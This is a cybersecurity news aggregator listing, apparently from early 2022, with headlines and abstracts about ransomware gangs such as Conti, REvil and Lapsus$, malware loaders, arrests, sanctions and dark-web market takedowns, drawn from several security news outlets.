Cybercriminals Are Increasingly Exploiting Vulnerabilities in Windows Print Spooler Full Text

Abstract Over the past year, various vulnerabilities in Windows Print Spooler have been discovered. By abusing them, cybercriminals have been able to take control of servers and victims’ machines, even without special admin access.

Dark Reading

May 9, 2022

Emotet is Testing New Attack Chain Full Text

Abstract Proofpoint researchers have spotted low-volume Emotet activity that is much different from typical Emotet threat behaviors, highly likely that the group is testing a new threat before using it. The campaign was spotted between April 4 and April 19.  The testing of different attack chains is mo ... Read More

Cyware Alerts - Hacker News

May 08, 2022

U.S. Offering $10 Million Reward for Information on Conti Ransomware Hackers Full Text

Abstract The U.S. State Department has  announced  rewards of up to $10 million for any information leading to the identification of key individuals who are part of the infamous Conti cybercrime gang. Additionally, it's offering another $5 million for intelligence information that could help arrest or convict individuals who are conspiring or attempting to affiliate with the group in a ransomware attack. The department called the Conti variant the "costliest strain of ransomware ever documented." Conti , the work of a Russia-based transnational organized crime group dubbed Gold Ulrick, is one most prolific ransomware cartels that has continued to strike entities globally while simultaneously  expanding its empire  by absorbing TrickBot and running side hustles that involve data extortion. After the syndicate expressed public support for Russia's invasion of Ukraine in February, it  suffered a major breach  of its own after its source code and internal chats were released

The Hacker News

May 08, 2022

Caramel credit card stealing service is growing in popularity Full Text

Abstract A credit card stealing service is growing in popularity, allowing any low-skilled threat actors an easy and automated way to get started in the world of financial fraud.

BleepingComputer

May 7, 2022

U.S. Offers $15 Million Reward for Information on Conti Ransomware Group Full Text

Abstract The United States state department has offered a reward of up to $15 million for information on the Russia-based Conti ransomware group, which has been blamed for cyber extortion attacks worldwide.

Reuters

May 04, 2022

Hackers stole data undetected from US, European orgs since 2019 Full Text

Abstract Cybersecurity analysts have exposed a lengthy operation attributed to the group of Chinese hackers known as "Winnti" and tracked as APT41, which focused on stealing intellectual property assets like patents, copyrights, trademarks, and other types of valuable data.

BleepingComputer

May 3, 2022

REvil Ransomware Gang is Back in the Game Full Text

Abstract After reporting its TOR activity weeks ago, researchers claim the return of the REvil group with new infrastructure and an updated malware sample with a modified encryptor for more targeted attacks. It is recommended to keep security shields charged up to fend off such threats. Meanwhile, the publi ... Read More

Cyware Alerts - Hacker News

May 03, 2022

Experts Analyze Conti and Hive Ransomware Gangs’ Chats With Their Victims Full Text

Abstract An analysis of four months of chat logs spanning more than 40 conversations between the operators of Conti and Hive ransomware and their victims has offered an insight into the groups' inner workings and their negotiation techniques. In one exchange, the Conti Team is said to have significantly reduced the ransom demand from a staggering $50 million to $1 million, a 98% drop, suggesting a willingness to settle for a far lower amount. "Both Conti and Hive are quick to lower ransom demands, routinely offering substantial reductions multiple times throughout negotiations," Cisco Talos  said  in a report shared with The Hacker News. "This signals that despite popular belief, victims of a ransomware attack actually have significant negotiating power." Conti  and  Hive  are among the most prevalent ransomware strains in the threat landscape, cumulatively accounting for  29.1% of attacks  detected during the three-month-period between October and December 2021. A

The Hacker News

May 02, 2022

Chinese Hackers Caught Exploiting Popular Antivirus Products to Target Telecom Sector Full Text

Abstract A Chinese-aligned cyberespionage group has been observed striking the telecommunication sector in Central Asia with versions of malware such as ShadowPad and PlugX. Cybersecurity firm SentinelOne tied the intrusions to an actor it tracks under the name "Moshen Dragon," with tactical overlaps between the collective and another threat group referred to as Nomad Panda (aka  RedFoxtrot ). "PlugX and ShadowPad have a well-established history of use among Chinese-speaking threat actors primarily for espionage activity," SentinelOne's Joey Chen  said . "Those tools have flexible, modular functionality and are compiled via shellcode to easily bypass traditional endpoint protection products." ShadowPad , labeled a "masterpiece of privately sold malware in Chinese espionage," emerged as a successor to PlugX in 2015, even as variants of the latter have continually popped up as part of different campaigns associated with Chinese threat actors. Alth

The Hacker News

May 2, 2022

The mystery behind the samples of the new REvil ransomware operation Full Text

Abstract The REvil ransomware gang has resumed its operations, experts found a new encryptor and a new attack infrastructure. The REvil ransomware operation shut down in October 2021, in January the Russian Federal Security Service (FSB) announced...

Security Affairs

May 2, 2022

Group-IB CEO remains in prison – the Russian-led company has been ‘blacklisted’ in Italy Full Text

Abstract The latest executive order from the Italian ACN agency banned Group-IB, a Russian-led cybersecurity firm from working in the government sector The latest executive order from the Italian National Cybersecurity Agency (NCA) banned Group-IB, a Russian-led...

Security Affairs

May 01, 2022

REvil ransomware returns: New malware sample confirms gang is back Full Text

Abstract The notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks.

BleepingComputer

April 28, 2022

Bumblebee, a new malware loader used by multiple crimeware threat actors Full Text

Abstract Threat actors have replaced the BazaLoader and IcedID malware with a new loader called Bumblebee in their campaigns. Cybercriminal groups that were previously using the BazaLoader and IcedID as part of their malware campaigns seem to have adopted...

Security Affairs

April 28, 2022

Cybercriminals Using New Malware Loader ‘Bumblebee’ in the Wild Full Text

Abstract Cybercriminal actors previously observed delivering BazaLoader and IcedID as part of their malware campaigns are said to have transitioned to a new loader called Bumblebee that's under active development. "Based on the timing of its appearance in the threat landscape and use by multiple cybercriminal groups, it is likely Bumblebee is, if not a direct replacement for BazaLoader, then a new, multifunctional tool used by actors that historically favored other malware," enterprise security firm Proofpoint  said  in a report shared with The Hacker News. Campaigns distributing the new highly sophisticated loader are said to have commenced in March 2022, while sharing overlaps with malicious activity leading to the deployment of Conti and Diavol ransomware, raising the possibility that the loader could act as a precursor for ransomware attacks. "Threat actors using Bumblebee are associated with malware payloads that have been linked to follow-on ransomware campaigns,&q

The Hacker News

April 27, 2022

Ransomware demands are growing, but life is getting tougher for malware gangs Full Text

Abstract Victims of ransomware attacks are paying higher ransoms than ever before, but there are signs that organizations are starting to take heed of cybersecurity advice, making them more resilient to cybercriminals.

ZDNet

April 27, 2022

Conti ransomware operations surge despite the recent leak Full Text

Abstract Conti ransomware gang continues to target organizations worldwide despite the massive data leak has shed light on its operations. Researchers from Secureworks state that the Conti ransomware gang, tracked as a Russia-based threat actor Gold Ulrick,...

Security Affairs

April 26, 2022

Stormous ransomware gang claims to have hacked Coca-Cola Full Text

Abstract The Stormous ransomware gang claims to have hacked the multinational beverage corporation Coca-Cola Company. The Stormous ransomware gang announced with a post on its leak site to have hacked the multinational beverage corporation Coca-Cola...

Security Affairs

April 26, 2022

Emotet Operators Use New Delivery Techniques Like OneDrive URLs and XLL Files Full Text

Abstract The activity occurred while Emotet was on a “spring break,” not conducting its typical high volume threat campaigns. The threat actor has since resumed its typical activity.

Proof Point

April 25, 2022

BlackCat Ransomware gang breached over 60 orgs worldwide Full Text

Abstract At least 60 entities worldwide have been breached by BlackCat ransomware, warns a flash report published by the U.S. FBI. The U.S. Federal Bureau of Investigation (FBI) published a flash report that states that at least 60 entities worldwide have...

Security Affairs

April 21, 2022

Cybercriminals Deliver IRS Tax Scams & Phishing Campaigns By Mimicking Government Vendors Full Text

Abstract Cybercriminals purposely choose specific times when all of us are busy with taxes, and preparing for holidays (e.g., Easter), that’s why you need to be especially careful during these times.

Security Affairs

April 21, 2022

REvil’s Tor Servers are Active Again Full Text

Abstract REvil ransomware’s servers in the Tor network are active again after months of inactivity. At present, these servers are redirecting users to a new operation that is believed to have started in mid-December 2021.

Cyware Alerts - Hacker News

April 20, 2022

REvil’s TOR sites come alive to redirect to new ransomware operation Full Text

Abstract REvil ransomware's servers in the TOR network are back up after months of inactivity and redirect to a new operation that appears to have started since at least mid-December last year.

BleepingComputer

April 19, 2022

Crooks steal $182 million from Beanstalk DeFi platform Full Text

Abstract Credit-based stablecoin protocol Beanstalk discloses a security breach that resulted in the loss of all of its $182 million. The decentralized, credit-based finance system Beanstalk suffered a security breach that resulted in financial losses...

Security Affairs

April 18, 2022

Conti’s Extended Connections with Karakurt Revealed Full Text

Abstract Researchers were able to gain access to an internal Conti VPS server, with the credentials of a user, allegedly the leader of the cybercrime enterprise. This resulted in several revelations about its connection with other groups.

Cyware Alerts - Hacker News

April 18, 2022

Researchers Share In-Depth Analysis of PYSA Ransomware Group Full Text

Abstract An 18-month-long analysis of the PYSA ransomware operation has revealed that the cybercrime cartel followed a five-stage software development cycle from August 2020, with the malware authors prioritizing features to improve the efficiency of its workflows. This included a user-friendly tool like a full-text search engine to facilitate the extraction of metadata and enable the threat actors to find and access victim information quickly. "The group is known to carefully research high-value targets before launching its attacks, compromising enterprise systems and forcing organizations to pay large ransoms to restore their data," Swiss cybersecurity company PRODAFT  said  in an exhaustive report published last week. PYSA, short for "Protect Your System, Amigo" and a successor of the Mespinoza ransomware, was first observed in December 2019 and has emerged as the third most prevalent ransomware strain detected during the fourth quarter of 2021. Since September 2020,

The Hacker News

April 18, 2022

Experts spotted Industrial Spy, a new stolen data marketplace Full Text

Abstract A new marketplace named Industrial Spy that focuses on the sale of stolen data appeared in the threat landscape. Malware HunterTeam and Bleeping Computer reported the born of a new marketplace called Industrial Spy that sells stolen data and offers...

Security Affairs

April 18, 2022

Lazarus Eyes Chemical Sector in South Korea Full Text

Abstract Lazarus, the North Korea-linked APT group, is targeting organizations operating in the chemical sector in South Korea. The campaign seems to be a continuation of Operation Dream Job spotted in August 2020.

Cyware Alerts - Hacker News

April 18, 2022

ZLoader C2 Servers Disrupted in Global Operation Full Text

Abstract Microsoft dismantled ZLoader networks, seizing 65 domains as its C2 servers and 319 additional domains registered using the domain generation algorithm. The botnet is used to target banks worldwide, including Brazil, Australia, and North America, to harvest financial data. It’s critical that privat ... Read More

Cyware Alerts - Hacker News

April 16, 2022

New Industrial Spy stolen data market promoted through cracks, adware Full Text

Abstract Threat actors have launched a new marketplace called Industrial Spy that sells stolen data from breached companies, promoting the site through adware and software cracks.

BleepingComputer

April 16, 2022

Lazarus Group Behind $540 Million Axie Infinity Crypto Hack and Attacks on Chemical Sector Full Text

Abstract The U.S. Treasury Department has implicated the North Korea-backed Lazarus Group (aka Hidden Cobra) in the theft of $540 million from video game Axie Infinity's Ronin Network last month. On Thursday, the Treasury  tied  the Ethereum  wallet address  that received the stolen funds to the threat actor and sanctioned the funds by adding the address to the Office of Foreign Assets Control's (OFAC) Specially Designated Nationals ( SDN ) List. "The FBI, in coordination with Treasury and other U.S. government partners, will continue to expose and combat the DPRK's use of illicit activities – including cybercrime and cryptocurrency theft – to generate revenue for the regime," the intelligence and law enforcement agency  said  in a statement. The cryptocurrency heist, the second-largest cyber-enabled theft to date, involved the siphoning of 173,600 Ether (ETH) and 25.5 million USD Coins from the Ronin cross-chain bridge, which allows users to transfer their digital as

The Hacker News

April 15, 2022

Haskers Gang Gives Away ZingoStealer Malware to Other Cybercriminals for Free Full Text

Abstract A crimeware-related threat actor known as Haskers Gang has released an  information-stealing malware  called ZingoStealer for free on, allowing other criminal groups to leverage the tool for nefarious purposes. "It features the ability to steal sensitive information from victims and can download additional malware to infected systems," Cisco Talos researchers Edmund Brumaghin and Vanja Svajcer  said  in a report shared with The Hacker News. "In many cases, this includes the  RedLine Stealer  and an XMRig-based cryptocurrency mining malware that is internally referred to as 'ZingoMiner.'" But in an interesting twist, the criminal group announced on Thursday that the ownership of the ZingoStealer project is changing hands to a new threat actor, in addition to offering to sell the source code for a negotiable price of $500. Since its inception last month, ZingoStealer is said to be undergoing consistent development and deployed specifically against Russi

The Hacker News

April 15, 2022

Conti Ransomware Gang claims responsibility for the Nordex hack Full Text

Abstract The Conti ransomware gang has claimed responsibility for the recent attack against Nordex, one of the largest manufacturers of wind turbines. The Conti ransomware gang claimed responsibility for the cyberattack that hit the manufacturer of wind turbines...

Security Affairs

April 15, 2022

ZingoStealer crimeware released for free in the cybercrime ecosystem Full Text

Abstract A new powerful crimeware called ZingoStealer was released for free by a threat actor known as Haskers Gang. ZingoStealer is a new information-stealer developed by a threat actor known as Haskers Gang who released it for free after they attempted...

Security Affairs

April 15, 2022

North Korea’s Lazarus Group Stole More than $600 Million in a Single Hack Targeting Axie Infinity Full Text

Abstract The FBI has blamed hackers associated with the North Korean government for stealing more than $600 million in cryptocurrency last month from a video gaming company -- the latest in a string of audacious cyber heists tied to Pyongyang.

CNN Money

April 15, 2022

Karakurt revealed as data extortion arm of Conti cybercrime syndicate Full Text

Abstract After breaching servers managed by the cybercriminals, security researchers found a connection between Conti ransomware and the recently emerged Karakurt data extortion group, showing that the two gangs are part of the same operation.

BleepingComputer

April 14, 2022

Instagram’s dark side: sexual harassers, crypto scammers, ID thieves Full Text

Abstract A platform for everyone to seamlessly share their best moments online, Instagram is slowly turning into a mecca for the undesirables—from sexual harassers to crypto "investors" helping you "get rich fast." How do you keep yourself safe against such profiles?

BleepingComputer

April 14, 2022

Haskers Gang Introduces New ZingoStealer Malware for Free to Target Gamers Full Text

Abstract This information stealer, first introduced to the wild in March 2022, is currently undergoing active development and multiple releases of new versions have been observed recently.

Cisco Talos

April 13, 2022

FBI, Europol Seize RaidForums Hacker Forum and Arrest Admin Full Text

Abstract An international law enforcement operation raided and took down RaidForums, one of the world's largest hacking forums notorious for selling access to hacked personal information belonging to users. Dubbed Tourniquet, the seizure of the cybercrime website involved authorities from the U.S., U.K., Sweden, Portugal, and Romania, with the criminal investigation resulting in the  arrest  of the forum's administrator at his home last month in Croydon, England. The three confiscated domains associated with the illicit marketplace include "raidforums[.]com," "Rf[.]ws," and "Raid[.]lol." Diogo Santos Coelho (aka "Omnipotent"), the said founder and chief administrator, was apprehended in the U.K. on January 31 and is pending extradition to the U.S. Santos Coelho has been charged with conspiracy, access device fraud, and aggravated identity theft. In addition to detailing Santos Coelho's central role in designing and administering the soft

The Hacker News

April 12, 2022

Ethereum dev imprisoned for helping North Korea evade sanctions Full Text

Abstract Virgil Griffith, a US cryptocurrency expert, was sentenced on Tuesday to 63 months in prison after pleading guilty to assisting the Democratic People's Republic of Korea (DPRK) with technical info on how to evade sanctions.

BleepingComputer

April 12, 2022

Operation TOURNIQUET: Authorities shut down dark web marketplace RaidForums Full Text

Abstract The dark web marketplace RaidForums has been shut down and its infrastructure seized as a result of Operation TOURNIQUET. The illegal dark web marketplace RaidForums has been shut down and its infrastructure seized as a result of the international...

Security Affairs

April 12, 2022

RaidForums hacking forum seized by police, owner arrested Full Text

Abstract The RaidForums hacker forum, used mainly for trading and selling stolen databases, has been shut down and its domain seized by U.S. law enforcement during Operation TOURNIQUET, an action coordinated by Europol that involved law enforcement agencies in several countries.

BleepingComputer

April 12, 2022

LockBit ransomware gang lurked in a U.S. gov network for months Full Text

Abstract Threat analysts have found evidence of malicious actors using the LockBit ransomware strain lingering in the network of a regional U.S. government agency for at least five months.

BleepingComputer

April 8, 2022

Looking Inside Pandora’s Box Full Text

Abstract The threat group uses the double extortion method to increase pressure on the victim. This means that they not only encrypt the victim’s files, but also exfiltrate them and threaten to release the data if the victim does not pay.

Fortinet

April 06, 2022

U.S. sanctions crypto-exchange Garantex for aiding Hydra Market Full Text

Abstract The U.S. Department of the Treasury's Office has announced sanctions against the cryptocurrency exchange Garantex, which has been linked to illegal transactions for Hydra Market.

BleepingComputer

April 05, 2022

Germany Shuts Down Russian Hydra Darknet Market; Seizes $25 Million in Bitcoin Full Text

Abstract Germany's Federal Criminal Police Office, the Bundeskriminalamt (BKA), on Tuesday announced the official takedown of Hydra, the world's largest illegal dark web marketplace that has cumulatively facilitated over $5 billion in Bitcoin transactions to date. "Bitcoins amounting to currently the equivalent of approximately €23 million were seized, which are attributed to the marketplace," the BKA said in a press release. Blockchain analytics firm Elliptic confirmed that the seizure occurred on April 5, 2022 in a series of 88 transactions amounting to 543.3 BTC. The agency attributed the shutdown of Hydra to an extensive investigation operation conducted by its Central Office for Combating Cybercrime (ZIT) in partnership with U.S. law enforcement authorities since August 2021. Launched in 2015, Hydra was a Russian-language darknet marketplace that opened as a competitor to the now-defunct Russian Anonymous Marketplace (aka RAMP), primarily known for its high-traffic

The Hacker News

April 2, 2022

UK Police charges two teenagers for their alleged role in the Lapsus$ extortion group Full Text

Abstract The City of London Police charged two of the seven teenagers who were arrested for their alleged role in the LAPSUS$ data extortion gang. The duo has been released on bail after appearing in the Highbury Corner Magistrates Court court on Friday. The...

Security Affairs

March 30, 2022

Conti Continues To Attack Even After Recent Code Leaks Full Text

Abstract Researchers have spotted an updated version of Conti ransomware as part of the global ransomware tracking efforts that allow it to reboot and encrypt the targeted system in Safe Mode. To avoid detection, Conti uses the Murmur3 hashing algorithm, which produces different hash values for all API func ... Read More

Cyware Alerts - Hacker News

March 30, 2022

Lapsus$ extortion gang claims to have hacked IT Giant Globant Full Text

Abstract The Lapsus$ extortion group claims to have hacked IT giant Globant and leaked tens of gigabytes of stolen data. The Lapsus$ extortion group claims to have hacked IT giant Globant and leaked roughly 70 Gb of stolen data. The gang claims that the company...

Security Affairs

March 30, 2022

FBI disrupts BEC cybercrime gangs targeting victims worldwide Full Text

Abstract A coordinated operation conducted by the FBI and its international law enforcement partners has resulted in disrupting business email compromise (BEC) schemes in several countries.

BleepingComputer

March 29, 2022

Hackers Steal Over $600 Million from Axie Infinity Developer’s Ronin Bridge Full Text

Abstract The Ronin bridge and Katana Dex have been halted after suffering an exploit for 173,600 Ethereum (ETH) and 25.5 million USD Coin (USDC), worth a combined $612 million at Tuesday's prices.

Coin Telegraph

March 29, 2022

Europol dismantles massive call center investment scam operation Full Text

Abstract Europol has announced the arrest of 108 people suspected of being involved in an international call center operation that tricked victims into investment scams.

BleepingComputer

March 28, 2022

Of Cybercriminals and IP Addresses Full Text

Abstract You don't like having the FBI knocking on your door at 6 am in the morning. Surprisingly, nor does your usual cybercriminal. That is why they hide (at least the good ones), for example, behind layers of proxies, VPNs, or TOR nodes. Their IP address will never be exposed directly to the target's machine. Cybercriminals will always use third-party IP addresses to deliver their attacks. There are countless ways to deliver cyberattacks. But one thing is common to all of them. The need for a pool of IP addresses to serve as a medium. Criminals need IP addresses to deliver distributed denial of service attacks. Criminals need IP addresses to hide behind when probing services. Criminals need IP addresses to attempt brute force attacks. Criminals need IP addresses to run bot networks and services. In a nutshell, criminals need to maintain IP addresses under their control for pretty much anything. It is their most important asset and is the ammo they need to deliver attacks. So how

The Hacker News

March 25, 2022

7 Suspected Members of LAPSUS$ Hacker Gang, Aged 16 to 21, Arrested in U.K. Full Text

Abstract The City of London Police has arrested seven teenagers between the ages of 16 and 21 for their alleged connections to the prolific LAPSUS$ extortion gang that's linked to a recent burst of attacks targeting NVIDIA, Samsung, Ubisoft, LG, Microsoft, and Okta. "The City of London Police has been conducting an investigation with its partners into members of a hacking group," Detective Inspector, Michael O'Sullivan, said in a statement shared with The Hacker News. "Seven people between the ages of 16 and 21 have been arrested in connection with this investigation and have all been released under investigation. Our enquiries remain ongoing." The development, which was first  disclosed  by BBC News, comes after a report from Bloomberg  revealed  that a 16-year-old Oxford-based teenager is the mastermind of the group. It's not immediately clear if the minor is one among the arrested individuals. The said teen, under the online alias White or Breachbase, is al

The Hacker News

March 25, 2022

UK police arrested 7 alleged members of Lapsus$ extortion gang Full Text

Abstract UK police suspect that a 16-year-old from Oxford is one of the leaders of the popular Lapsus$ extortion group. The City of London Police announced to have arrested seven teenagers suspected of being members of the notorious Lapsus$ extortion gang,...

Security Affairs

March 24, 2022

23-Year-Old Russian Hacker Wanted by FBI for Running Marketplace of Stolen Logins Full Text

Abstract A 23-year-old Russian national has been indicted in the U.S. and added to the Federal Bureau of Investigation's (FBI) Cyber Most Wanted List for his alleged role as the administrator of Marketplace A, a cyber crime forum that sold stolen login credentials, personal information, and credit card data. Igor Dekhtyarchuk , who first appeared in hacker forums in 2013 under the alias "floraby," has been accused of charges of wire fraud, access device fraud, and aggravated identity theft, a set of offenses that could lead to up to 20 years in federal prison. According to the FBI's  Wanted poster , Dekhtyarchuk previously studied at the Ural State University in Yekaterinburg, Russia, and was last known to reside in the city of Kamensk-Uralsky. "Marketplace A specialized in the sale of unlawfully obtained access devices for compromised online payment platforms, retailers, and credit card accounts, including providing the data associated with those accounts such as na

The Hacker News

March 24, 2022

Alleged Microsoft, Okta hackers arrested in UK Full Text

Abstract British authorities arrested seven individuals on Thursday suspected of hacking major tech companies including Okta and Microsoft, according to Reuters.

The Hill

March 24, 2022

Lapsus$ suspects arrested for Microsoft, Nvidia, Okta hacks Full Text

Abstract As Lapsus$ data extortion gang announced that several of its members are taking a vacation, the City of London Police say they have arrested seven individuals connected to the gang.

BleepingComputer

March 24, 2022

This is how much the average Conti hacking group member earns a month Full Text

Abstract According to findings by Secureworks, the average Conti ransomware group member earns a salary of $1,800 per month, a figure you might consider low considering the success of the criminal gang.

ZDNet

March 23, 2022

FBI adds Russian cybercrime market owner to most wanted list Full Text

Abstract A Russian national has been indicted by the US DOJ and added to the FBI's Cyber Most Wanted list for allegedly creating and managing a cybercrime marketplace.

BleepingComputer

March 23, 2022

It’s official, Lapsus$ gang compromised a Microsoft employee’s account Full Text

Abstract Microsoft confirmed that Lapsus$ extortion group has hacked one of its employees to access and steal the source code of some projects. Microsoft confirmed that Lapsus$ extortion group has hacked one of its employees to access and steal the source...

Security Affairs

March 22, 2022

Lapsus$ Data Kidnappers Claim Snatches From Microsoft, Okta Full Text

Abstract Lapsus$ shared screenshots of internal Okta systems and 40Gb of purportedly stolen Microsoft data on Bing, Bing Maps and Cortana.

Threatpost

March 22, 2022

BlackMatter Affiliates Propagate BlackCat Ransomware Full Text

Abstract Researchers analyzed two recent ransomware attacks by BlackCat and BlackMatter and discovered overlaps in their TTPs. However, one of the representatives of BlackCat had already claimed that the ransomware is not the rebranding of BlackMatter. BlackCat could be playing an important role in helping ... Read More

Cyware Alerts - Hacker News

March 22, 2022

Lapsus$ extortion gang claims to have stolen sensitive data from Okta Full Text

Abstract The Lapsus$ extortion group claims to have stolen sensitive data from the identity and access management giant Okta solutions. The gang announced the alleged hack through its Telegram channel and shared a series of screenshots as proof of the hack....

Security Affairs

March 21, 2022

Lapsus$ gang claims to have hacked Microsoft source code repositories Full Text

Abstract Microsoft is investigating claims that the Lapsus$ hacking group breached its internal Azure DevOps source code repositories. Microsoft announced that is investigating claims that the Lapsus$ cybercrime gang breached their internal Azure DevOps source...

Security Affairs

March 19, 2022

Avoslocker ransomware gang targets US critical infrastructure Full Text

Abstract The Federal Bureau of Investigation (FBI) reported that AvosLocker ransomware is being used in attacks targeting US critical infrastructure. The Federal Bureau of Investigation (FBI) published a joint cybersecurity advisory warning of AvosLocker...

Security Affairs

March 19, 2022

Crooks claims to have stolen 4TB of data from TransUnion South Africa Full Text

Abstract TransUnion South Africa discloses a data breach, threat actors who stolen sensitive data, demanded a ransom payment not to release stolen data. TransUnion South Africa announced that threat actors compromised a company server based in South Africa...

Security Affairs

March 19, 2022

Exotic Lily initial access broker works with Conti gang Full Text

Abstract Google's Threat Analysis Group (TAG) uncovered a new initial access broker, named Exotic Lily, that is closely affiliated with the Conti ransomware gang. Google's Threat Analysis Group (TAG) researchers linked a new initial access broker, named...

Security Affairs

March 18, 2022

Experts Find Some Affiliates of BlackMatter Now Spreading BlackCat Ransomware Full Text

Abstract An analysis of two ransomware attacks has  identified overlaps  in the tactics, techniques, and procedures (TTPs) between BlackCat and BlackMatter, indicating a strong connection between the two groups. While it's typical of ransomware groups to rebrand their operations in response to increased visibility into their attacks,  BlackCat  (aka Alphv) marks a new frontier in that the cyber crime cartel is built out of affiliates of other ransomware-as-a-service (RaaS) operations. BlackCat first emerged in November 2021 and has since targeted several organizations worldwide over the past few months. It has been called out for being similar to  BlackMatter , a short-lived ransomware family that originated from  DarkSide , which attracted notoriety for its high-profile attack on  Colonial Pipeline  in May 2021. In an interview with Recorded Future's The Record last month, a BlackCat representative dismissed rumors that it's a rebranding of BlackMatter, while noting that it

The Hacker News

March 18, 2022

Google Uncovers ‘Initial Access Broker’ Working with Conti Ransomware Gang Full Text

Abstract Google's Threat Analysis Group (TAG) took the wraps off a new  initial access broker  that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations. Dubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform ( CVE-2021-40444 ) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally. "Initial access brokers are the opportunistic locksmiths of the security world, and it's a full-time job," TAG researchers Vlad Stolyarov and Vlad Stolyarov  said . "These groups specialize in breaching a target in order to open the doors — or the Windows — to the malicious actor with the highest bid." Exotic Lily, first spotted in September 2021, is said to have been involved in data exfiltration and deployment of th

The Hacker News

March 17, 2022

Google exposes tactics of a Conti ransomware access broker Full Text

Abstract Google's Threat Analysis Group has exposed the operations of a threat actor group dubbed "EXOTIC LILY," an initial access broker linked to the Conti and Diavol ransomware operations.

BleepingComputer

March 17, 2022

Ukraine SBU arrested a hacker who supported Russia during the invasion Full Text

Abstract The Security Service of Ukraine (SBU) announced the arrest of a "hacker" who helped Russian Army during the invasion. The Security Service of Ukraine (SBU) announced to have arrested a hacker who provided technical support to Russian troops during...

Security Affairs

March 17, 2022

Ukraine Secret Service Arrests Hacker Helping Russian Invaders Full Text

Abstract The Security Service of Ukraine (SBU) said it has detained a "hacker" who offered technical assistance to the invading Russian troops by providing mobile communication services inside the Ukrainian territory. The anonymous suspect is said to have broadcasted text messages to Ukrainian officials, including security officers and civil servants, proposing that they surrender and take the side of Russia. The individual has also been accused of routing phone calls from Russia to the mobile phones of Russian troops in Ukraine. "Up to a thousand calls were made through this hacker in one day. Many of them are from the top leadership of the enemy army," the SBU  alleged , adding it confiscated the equipment that was used to pull off the operation. Besides implicating the hacker for helping Russia make anonymous phone calls to its military forces based in Ukraine, the agency said the hacker passed commands and instructions to different groups of "Russian invaders.&

The Hacker News

March 17, 2022

Lapsus$ gang sends a worrying message to would-be criminals Full Text

Abstract The Lapsus$ cyber-crime gang, believed to be based in Brazil, until recently was best known for attacks on that country's Ministry of Health and Portuguese media outlets SIC Noticias and Expresso.

The Register

March 14, 2022

Russian Ransomware Gang Retool Custom Hacking Tools of Other APT Groups Full Text

Abstract A Russian-speaking ransomware outfit likely targeted an unnamed entity in the gambling and gaming sector in Europe and Central America by repurposing custom tools developed by other APT groups like Iran's MuddyWater, new research has found. The unusual attack chain involved the abuse of stolen credentials to gain unauthorized access to the victim network, ultimately leading to the deployment of Cobalt Strike payloads on compromised assets,  said  Felipe Duarte and Ido Naor, researchers at Israeli incident response firm Security Joes, in a report published last week. Although the infection was contained at this stage, the researchers characterized the compromise as a case of a suspected ransomware attack. The intrusion is said to have taken place in February 2022, with the attackers making use of post-exploitation tools such as  ADFind , NetScan,  SoftPerfect , and  LaZagne . Also employed is an AccountRestore executable to brute-force administrator credentials and a forked ver

The Hacker News

March 11, 2022

LockBit ransomware gang claims attack on Bridgestone Americas Full Text

Abstract A cyberattack on Bridgestone Americas, one of the largest manufacturers of tires in the world, has been claimed by the LockBit ransomware gang.

BleepingComputer

March 11, 2022

Lapsus$ Ransomware Group is hiring, it announced recruitment of insiders Full Text

Abstract Lapsus$ Ransomware gang is looking for insiders willing to sell remote access to major technology corporations and ISPs. Thursday, March 10, Lapsus$ ransomware gang announced they're starting to recruit insiders employed within major technology giants...

Security Affairs

March 10, 2022

REvil ransomware member extradited to U.S. to stand trial for Kaseya attack Full Text

Abstract The U.S. Department of Justice announced that alleged REvil ransomware affiliate, Yaroslav Vasinskyi, was extradited to the United States last week to stand trial for the Kaseya cyberattack.

BleepingComputer

March 01, 2022

TrickBot Malware Gang Upgrades its AnchorDNS Backdoor to AnchorMail Full Text

Abstract Even as the TrickBot infrastructure closed shop, the operators of the malware are continuing to refine and retool their arsenal to carry out attacks that culminated in the deployment of Conti ransomware. IBM Security X-Force, which discovered the revamped version of the criminal gang's  AnchorDNS  backdoor, dubbed the new, upgraded variant AnchorMail. AnchorMail "uses an email-based [command-and-control] server which it communicates with using SMTP and IMAP protocols over TLS," IBM's malware reverse engineer, Charlotte Hammond,  said . "With the exception of the overhauled C2 communication mechanism, AnchorMail's behavior aligns very closely to that of its AnchorDNS predecessor." The cybercrime actor behind TrickBot, ITG23 aka Wizard Spider, is also known for its development of the Anchor malware framework, a backdoor reserved for targeting selected high value victims since at least 2018 via TrickBot and BazarBackdoor (aka BazarLoader), an additiona

The Hacker News

February 28, 2022

Researcher leaked Conti’s internal chat messages in response to its support to Russia Full Text

Abstract A Ukrainian researcher leaked tens of thousands of internal chat messages belonging to the Conti ransomware operation. A Ukrainian researcher leaked 60,694 messages internal chat messages belonging to the Conti ransomware operation after the announcement...

Security Affairs

February 28, 2022

Hackers to NVIDIA: Remove mining cap or we leak hardware data Full Text

Abstract The Lapsus$ data extortion group has released what they claim to be data stolen from the Nvidia GPU designer. The cache is an archive that is almost 20GB large.

BleepingComputer

February 25, 2022

TrickBot malware operation shuts down, devs move to BazarBackdoor Full Text

Abstract The TrickBot malware operation has shut down after its core developers move to the Conti ransomware gang to focus development on the stealthy BazarBackdoor and Anchor malware families.

BleepingComputer

February 25, 2022

TrickBot Takes a Break, Leaving Researchers Scratching Their Heads Full Text

Abstract The infamous trojan is likely making some major operational changes, researchers believe.

Threatpost

February 25, 2022

Ransomware gangs, hackers pick sides over Russia invading Ukraine Full Text

Abstract Hacker crews are picking sides as the Russian invasion into Ukraine continues, issuing bans and threats for supporters of the opposite side.

BleepingComputer

February 24, 2022

TrickBot Gang Likely Shifting Operations to Switch to New Malware Full Text

